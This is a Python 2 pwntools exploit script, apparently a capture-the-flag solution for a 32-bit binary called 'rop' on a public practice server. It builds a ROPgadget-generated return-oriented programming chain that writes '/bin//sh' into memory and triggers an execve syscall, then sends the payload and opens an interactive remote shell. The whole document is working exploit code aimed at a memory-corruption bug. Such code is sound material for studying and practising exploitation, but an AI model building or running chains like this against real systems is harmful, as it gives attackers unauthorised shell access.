#!/usr/bin/env python2
from pwn import *
from LibcSearcher import *
from struct import pack
import os
context(arch = "i386",os = "linux", log_level = "debug")
|
|
|
|
# ROPgadget --binary rop --ropchain
|
|
|
|
# Padding goes here
|
|
p = 0x10*'0'
|
|
|
|
p += pack('<I', 0x0806ecda) # pop edx ; ret
|
|
p += pack('<I', 0x080ea060) # @ .data
|
|
p += pack('<I', 0x080b8016) # pop eax ; ret
|
|
p += '/bin'
|
|
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
|
|
p += pack('<I', 0x0806ecda) # pop edx ; ret
|
|
p += pack('<I', 0x080ea064) # @ .data + 4
|
|
p += pack('<I', 0x080b8016) # pop eax ; ret
|
|
p += '//sh'
|
|
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
|
|
p += pack('<I', 0x0806ecda) # pop edx ; ret
|
|
p += pack('<I', 0x080ea068) # @ .data + 8
|
|
p += pack('<I', 0x080492d3) # xor eax, eax ; ret
|
|
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
|
|
p += pack('<I', 0x080481c9) # pop ebx ; ret
|
|
p += pack('<I', 0x080ea060) # @ .data
|
|
p += pack('<I', 0x080de769) # pop ecx ; ret
|
|
p += pack('<I', 0x080ea068) # @ .data + 8
|
|
p += pack('<I', 0x0806ecda) # pop edx ; ret
|
|
p += pack('<I', 0x080ea068) # @ .data + 8
|
|
p += pack('<I', 0x080492d3) # xor eax, eax ; ret
|
|
p += pack('<I', 0x0807a66f) # inc eax ; ret
|
|
p += pack('<I', 0x0807a66f) # inc eax ; ret
|
|
p += pack('<I', 0x0807a66f) # inc eax ; ret
|
|
p += pack('<I', 0x0807a66f) # inc eax ; ret
|
|
p += pack('<I', 0x0807a66f) # inc eax ; ret
|
|
p += pack('<I', 0x0807a66f) # inc eax ; ret
|
|
p += pack('<I', 0x0807a66f) # inc eax ; ret
|
|
p += pack('<I', 0x0807a66f) # inc eax ; ret
|
|
p += pack('<I', 0x0807a66f) # inc eax ; ret
|
|
p += pack('<I', 0x0807a66f) # inc eax ; ret
|
|
p += pack('<I', 0x0807a66f) # inc eax ; ret
|
|
p += pack('<I', 0x0806c943) # int 0x80
|
|
|
|
io = remote("hackme.inndy.tw", 7704)
|
|
#io = process('./rop')
|
|
io.sendline(p)
|
|
io.interactive()
|